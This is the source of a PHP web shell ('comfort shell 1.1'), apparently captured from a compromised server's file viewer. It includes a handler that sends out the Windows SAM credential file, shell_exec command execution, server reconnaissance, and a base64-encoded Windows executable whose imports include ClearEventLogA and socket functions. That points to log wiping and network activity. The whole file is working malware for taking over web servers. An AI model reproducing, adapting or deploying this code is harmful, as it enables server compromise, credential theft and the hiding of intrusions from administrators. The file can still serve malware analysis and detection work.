Viewing file: serverkapi.php (94.9 KB) -rw-rw-rw- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if($_REQUEST['sam'])
{
function send_file($name)
{
$status = FALSE;
$path = $_SERVER["WINDIR"]."\\repair\\".$name;
if (!is_file($path) or connection_status()!=0) return(FALSE);
header("Content-type: application/octet-stream");
header("Content-Disposition: inline; filename=\"".$name."\"");
header("Content-length: ".(string)(filesize($path)));
header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"),
date("s"), date("m"), date("d"), date("Y")))." GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
if ($file = fopen($path, 'rb'))
{
while(!feof($file) and (connection_status()==0)) {
print(fread($file, 1024*8));
flush();
}
$status = (connection_status()==0);
fclose($file);
}
return($status);
}
send_file("sam") ;
}
ERROR_REPORTING(0);
function cmd_exec($cmd)
{
$result = shell_exec($cmd);
return $result;
}
?>
<html>
<head>
<title>.:: hackerīs best! comfort shell 1.1 by AcE / Modified by Say ;)::.</title>
<style type="text/css">
<!--
body {
background-color: #F3F3F3;
}
body,td,th {
font-size: 13px;
letter-spacing:2px;
color:#003366;
}
#head {
height: 15px;
width:50%;
margin: 10px;
background-color: #000000;
}
a:link{
color:#00FF00;
text-decoration: none
}
a:visited{
color:#00FF00;
text-decoration: none
}
a:hover{
color:#00FF00;
text-decoration: none
}
a:active{
color:#00FF00;
text-decoration: none
}
#menu {
float: left;
width: 150px;
margin-right: 20px;
background-color: #000000;
}
#topbox {
width:100%;
height:350px;
padding-left:5px;
border: 1pt solid black;
background-color: #F3F3F3;
}
#commandline {
width:90%;
}
#cmd_button {
width:9%;
background-color: #F3F3F3;
}
#upload_button {
float:left;
background-color: #F3F3F3;
}
#upload {
float:left;
padding-left:5px;
width:30%;
border: 1pt solid black;
}
#remote_upload {
float:left;
width:30%;
margin-left:3%;
padding-left:5px;
border: 1pt solid black;
}
#port_forwarding {
float:left;
width:30%;
margin-left:3%;
padding-left:5px;
border: 1pt solid black;
}
#reverse {
float: left;
padding-left:5px;
margin-top: 10px;
width:99%;
border: 1pt solid black;
}
#eval {
float: left;
padding-left:5px;
margin-top: 10px;
width:99%;
border: 1pt solid black;
}
#speed {
padding-left:5px;
margin-top: 120px;
border: 1pt solid black;
}
#mysql_tbl_but {
width:200px;
}
#mysql_content {
width:200px;
padding-left:5px;
border: 1pt solid black;
}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<hr>
<?php
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
$method = $_COOKIE['exec'];
$server_time = date("H:i:s", time());
$server_documentroot = $_SERVER['DOCUMENT_ROOT'];
$server_software = $_SERVER['SERVER_SOFTWARE'];
$hacker_ip = $_SERVER['REMOTE_ADDR'];
$shell_name = $_SERVER['SCRIPT_FILENAME'];
$safe_mode = "<font color=green><b>OFF</b></font>";
$on = "<font color=green><b>ON</b></font>";
$off = "<font color=red><b>OFF</b></font>";
if(diskfreespace("C:"))
{
$free_space[0] = view_size(diskfreespace("C:")); if (!$free_space) {$free_space = 0;}
$total_space[0] = view_size(disk_total_space("C:")); if (!$total_space) {$total_space = 0;}
$space_name[0] = "C:";
}
if(diskfreespace("D:"))
{
$free_space[1] = view_size(diskfreespace("D:")); if (!$free_space) {$free_space = 0;}
$total_space[1] = view_size(disk_total_space("D:")); if (!$total_space) {$total_space = 0;}
$space_name[1] = "D:";
}
if(diskfreespace("E:"))
{
$free_space[2] = view_size(diskfreespace("E:")); if (!$free_space) {$free_space = 0;}
$total_space[2] = view_size(disk_total_space("E:")); if (!$total_space) {$total_space = 0;}
$space_name[2] = "E:";
}
if(diskfreespace("F:"))
{
$free_space[3] = view_size(diskfreespace("F:")); if (!$free_space) {$free_space = 0;}
$total_space[3] = view_size(disk_total_space("F:")); if (!$total_space) {$total_space = 0;}
$space_name[3] = "F:";
}
if(function_exists('curl_version')) { $curl = $on; } else { $curl = $off; }
if(function_exists('mysql_connect')) { $mysql = $on; } else { $mysql = $off; }
if(function_exists('mssql_connect')) { $mssql = $on; } else { $mssql = $off; }
if(function_exists('pg_connect')) { $pgsql = $on; } else { $pgsql = $off; }
if(function_exists('ocilogon')) { $oracle = $on; } else { $oracle = $off; }
if(ini_get("safe_mode"))
{
$safe_mode = "<font color=red><b>ON</b></font>";
}
echo "<pre>
Safe_Mode: [$safe_mode]
Your IP: [$hacker_ip]
Server Time: [$server_time]
Document Root: [$server_documentroot]
Shell-Path: [$shell_name]
Extensions: Curl: [$curl] MySQL: [$mysql] PostgreSQL: [$pgsql] Oracle: [$oracle]
Space: $space_name[0] [".$free_space[0]."] of [".$total_space[0]."]<br>";
$i = 1;
while($i < sizeof($total_space))
{
echo " $space_name[$i] [".$free_space[$i]."] of [".$total_space[$i]."]<br>";
++$i;
}
echo "Exec-Method: $method";
echo "<br />Modified by: Saykic</pre>";
$bw = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAANXJ9bST3xCEk98QhJPfEIyiH/CE098QihIvsIQj3xCKEi9QhLPfEIST3wCHo98QjKNawITj3xCKEi5whIPfEIUmljaEk98QgAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBAAuS1pAAAAAAAAAAADgAA8BCwEGAAAQAAAAIAAAAAAAAN8aAAAAEAAAACAAAAAAQAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAUAAAABAAAIgXAQADAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAADsIAAAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAANQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAB4MAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACQBAAAACAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAQAAAwC5kYXRhAAAAmAMAAAAwAAAAEAAAADAAAAAAAAAAAAAAAAAAAEAAAMAuaWZjBwAAAAEAAAAAQAAAAAAAAABAAADho6f/AhxYAAAAAAAgAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0IgAARiIAACQiAAAAAAAAciQAAFwkAABUJAAARCQAADQkAAAiJAAACiQAAAAkAADoIwAAzCMAALgjAACgIwAAAAAAAHAiAAB6IgAAhCIAAI4iAACeIgAAriIAALgiAADCIgAAzCIAAOAiAAD2IgAA/iIAAA4jAAAeIwAAKiMAAD4jAABOIwAAXiMAAGwjAAB+IwAAkiMAAOgiAAAAAAAACwAAgAkAAIAXAACACgAAgAQAAIASAACAEwAAgBAAAIADAACANAAAgAwAAIBzAACAAAAAAAAAAAAAAIBEAAAAAP/////PG0AA4xtAAFAhAAAAAAAAAAAAAFYiAAAAIAAA8CEAAAAAAAAAAAAAZCIAAKAgAACUIQAAAAAAAAAAAADUIgAARCAAAGAhAAAAAAAAAAAAAIIkAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0IgAARiIAACQiAAAAAAAAciQAAFwkAABUJAAARCQAADQkAAAiJAAACiQAAAAkAADoIwAAzCMAALgjAACgIwAAAAAAAHAiAAB6IgAAhCIAAI4iAACeIgAAriIAALgiAADCIgAAzCIAAOAiAAD2IgAA/iIAAA4jAAAeIwAAKiMAAD4jAABOIwAAXiMAAGwjAAB+IwAAkiMAAOgiAAAAAAAACwAAgAkAAIAXAACACgAAgAQAAIASAACAEwAAgBAAAIADAACANAAAgAwAAIBzAACAAAAAAD0AQ2xvc2VFdmVudExvZwA5AENsZWFyRXZlbnRMb2dBAACoAU9wZW5FdmVudExvZ0EAQURWQVBJMzIuZGxsAABXUzJfMzIuZGxsAACeAnByaW50ZgAAxQJzdHJzdHIAAJcCbWVtY3B5AAAPAD8/MkBZQVBBWElAWgAApQBfYmVnaW50aHJlYWQAALoCc3RyY3B5AACyAnNwcmludGYAvgJzdHJsZW4AAKYCcmFuZAAATVNWQ1JULmRsbAAA0wBfZXhpdABIAF9YY3B0RmlsdGVyAEkCZXhpdAAAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAegBEZWxldGVDcml0aWNhbFNlY3Rpb24ADAFHZXRDb21wdXRlck5hbWVBAAAZAkluaXRpYWxpemVDcml0aWNhbFNlY3Rpb24ARwJMZWF2ZUNyaXRpY2FsU2VjdGlvbgAASgNTbGVlcEV4AI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AAJgBR2V0UHJvY0FkZHJlc3MAAEgCTG9hZExpYnJhcnlBAADVAUdldFRpY2tDb3VudAAASQNTbGVlcABGAUdldERpc2tGcmVlU3BhY2VFeEEASwFHZXREcml2ZVR5cGVBAEtFUk5FTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA